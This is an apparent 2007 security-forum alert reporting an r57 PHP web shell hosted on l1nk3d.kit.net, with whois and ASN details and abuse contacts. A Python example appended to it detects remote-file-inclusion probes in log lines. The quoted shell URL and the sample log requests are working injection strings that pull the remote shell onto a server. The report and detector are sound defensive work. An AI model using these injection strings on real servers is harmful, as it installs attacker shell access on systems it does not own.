Paul
CastleCops Founder
 Joined: Feb 22, 2002 Posts: 27351

Posted: Fri Nov 30, 2007 2:54 am Post subject: [WsIRT#273] r57shell @AS28604

Attack Alert Full Report: /r57shell_attack273.html
Changed status to confirmed attack.
IP Converted: 201.7.184.2
dword = 3372726274
hex1 = 0xc907b802
hex2 = 0xc9.0x7.0xb8.0x2
oct = 0311.07.0270.02
Whois Server Version 2.0
Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.
Domain Name: KIT.NET
Registrar: REGISTER.COM, INC.
Whois Server: whois.register.com
Referral URL: http://www.register.com
Name Server: NS01.GLOBO.COM
Name Server: NS02.GLOBO.COM
Status: clientTransferProhibited
Updated Date: 28-aug-2006
Creation Date: 09-jan-1997
Expiration Date: 08-jan-2011
>>> Last update of whois database: Fri, 30 Nov 2007 02:49:46 UTC <<<
Registrant:
TV Globo Ltda.
--- ---
Rua Lopes Quintas, 303
Rio de Janeiro, BR 22460-1058
Email: regina.sampaio@tvglobo.com.br
Registrar Name....: REGISTER.COM, INC.
Registrar Whois...: whois.register.com
Registrar Homepage: www.register.com
Domain Name: kit.net
Created on..............: Thu, Jan 09, 1997
Expires on..............: Sat, Jan 08, 2011
Record last updated on..: Mon, Jul 23, 2007
Administrative Contact:
TV Globo Ltda.
--- ---
Rua Lopes Quintas, 303
Rio de Janeiro, BR 22460-1058
Phone: +1.552125401058
Email: regina.sampaio@tvglobo.com.br
Technical Contact:
Registercom
Domain Registrar
575 8th Avenue
New York, NY 10018
Phone: +1.9027492701
Email: domainregistrar@register.com
DNS Servers:
ns02.globo.com
ns01.globo.com
View CIDR AS28604 Report: http://www.cidr-report.org/cgi-bin/as-report?as=28604
"28604 | BR | lacnic | 2005-07-14 | TV GLOBO LTDA"
Extended information for AS28604:
State/Province:
Country: br
Responsible Domain: corp.globo.com
Abuse Email: carolo@corp.globo.com
Attackers are probing vulnerable web servers and then injecting this script from this server. This is the r57 shell script that gives attackers shell access to the exploited remote web server. Please have this script removed as soon as possible.
Quote: http://l1nk3d.kit.net/r57.1??
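The report above lists the drop server's address in four spellings (dword, hex, dotted hex, dotted octal) because an attacker can write the same host any of those ways in the injected URL, and a responder grepping logs for "201.7.184.2" or "kit.net" alone will miss them. The following is an added example, not code from the WsIRT post or from CastleCops: it reproduces the four conversions, maps any of those spellings back to a dotted quad, and runs a remote-file-inclusion detector over constructed Apache-style log lines that use the quoted URL. The function names, the client addresses (RFC 5737 documentation ranges) and the log lines are all assumptions made for the example; the trailing `??` in the quoted URL is the usual RFI trick, since whatever suffix the vulnerable include appends ends up in the query string and the remote file is fetched unchanged.

```python
"""Added example (not part of the WsIRT post): the IP spellings the report lists,
a normaliser that maps any of them back to a dotted quad, and an RFI detector
run over constructed Apache-style log lines that reuse the reported URL."""
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import parse_qsl, urlsplit


def ip_forms(ip: str) -> Dict[str, str]:
    """The four alternate spellings of a dotted-quad IPv4 address."""
    octets = [int(o) for o in ip.split(".")]
    if len(octets) != 4 or any(not 0 <= o <= 255 for o in octets):
        raise ValueError(f"not a dotted quad: {ip}")
    dword = (octets[0] << 24) | (octets[1] << 16) | (octets[2] << 8) | octets[3]
    return {
        "dword": str(dword),                            # 3372726274
        "hex1": f"0x{dword:08x}",                       # 0xc907b802
        "hex2": ".".join(f"0x{o:x}" for o in octets),   # 0xc9.0x7.0xb8.0x2
        "oct": ".".join(f"0{o:o}" for o in octets),     # 0311.07.0270.02
    }


def _parse_part(part: str) -> int:
    """inet_aton rules: 0x prefix is hex, a leading 0 is octal, else decimal."""
    p = part.lower()
    if p.startswith("0x"):
        return int(p[2:], 16)
    if len(p) > 1 and p[0] == "0":
        return int(p, 8)
    return int(p, 10)


def normalize_host(host: str) -> Optional[str]:
    """Canonical dotted quad for any inet_aton-style spelling (dword, hex,
    octal, mixed, or 1- to 3-part forms); None when the host is a name."""
    try:
        vals = [_parse_part(p) for p in host.split(".")]
    except ValueError:
        return None
    n = len(vals)
    if not 1 <= n <= 4:
        return None
    # All but the last part are 8-bit fields; the last one absorbs the rest.
    widths = [8] * (n - 1) + [32 - 8 * (n - 1)]
    if any(not 0 <= v < (1 << w) for v, w in zip(vals, widths)):
        return None
    value = 0
    for v, w in zip(vals, widths):
        value = (value << w) | v
    return ".".join(str((value >> s) & 0xFF) for s in (24, 16, 8, 0))


# Apache combined log: client, ident, user, [time], "METHOD target proto", status ...
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def find_rfi(lines: List[str], local_hosts=frozenset()) -> List[Tuple[str, str, str, str]]:
    """Flag requests whose query string carries an absolute URL to a host we do
    not own, the fingerprint of an RFI probe. Numeric hosts are normalised so a
    dword/hex/octal spelling of the drop server is not missed.
    Returns (client, parameter, raw url, canonical host)."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for key, value in parse_qsl(query, keep_blank_values=True):
            u = urlsplit(value.strip())
            if u.scheme.lower() not in ("http", "https", "ftp") or not u.hostname:
                continue
            host = normalize_host(u.hostname) or u.hostname
            if host in local_hosts:
                continue
            hits.append((m.group("src"), key, value, host))
    return hits


# Constructed sample log lines (not from the report). The probing client is a
# documentation address; the included URL is the one quoted in the post, plus
# the same drop server spelled as a dword and as dotted hex, which a plain
# string match on "kit.net" or "201.7.184.2" would miss.
SAMPLE_LOG = [
    '198.51.100.7 - - [30/Nov/2007:02:40:12 +0000] "GET /index.php?page=http://l1nk3d.kit.net/r57.1?? HTTP/1.0" 200 512 "-" "libwww-perl/5.805"',
    '198.51.100.7 - - [30/Nov/2007:02:40:13 +0000] "GET /index.php?page=http://3372726274/r57.1?? HTTP/1.0" 200 512 "-" "libwww-perl/5.805"',
    '198.51.100.7 - - [30/Nov/2007:02:40:14 +0000] "GET /index.php?page=http://0xc9.0x7.0xb8.0x2/r57.1?? HTTP/1.0" 200 512 "-" "libwww-perl/5.805"',
    '192.0.2.10 - - [30/Nov/2007:02:41:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [30/Nov/2007:02:41:05 +0000] "GET /go?url=http://www.example.com/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]


if __name__ == "__main__":
    print(ip_forms("201.7.184.2"))
    for client, param, url, host in find_rfi(SAMPLE_LOG, local_hosts={"www.example.com"}):
        print(f"RFI probe from {client}: {param}={url} (drop host {host})")
```

Run it as a script to see the three probes reported against the one canonical drop host; the redirect to a host listed in `local_hosts` and the plain `page=about` request are not flagged. In practice the detector is only as good as the hostname normalisation, which is why the report's alternate forms are worth keeping in the ticket.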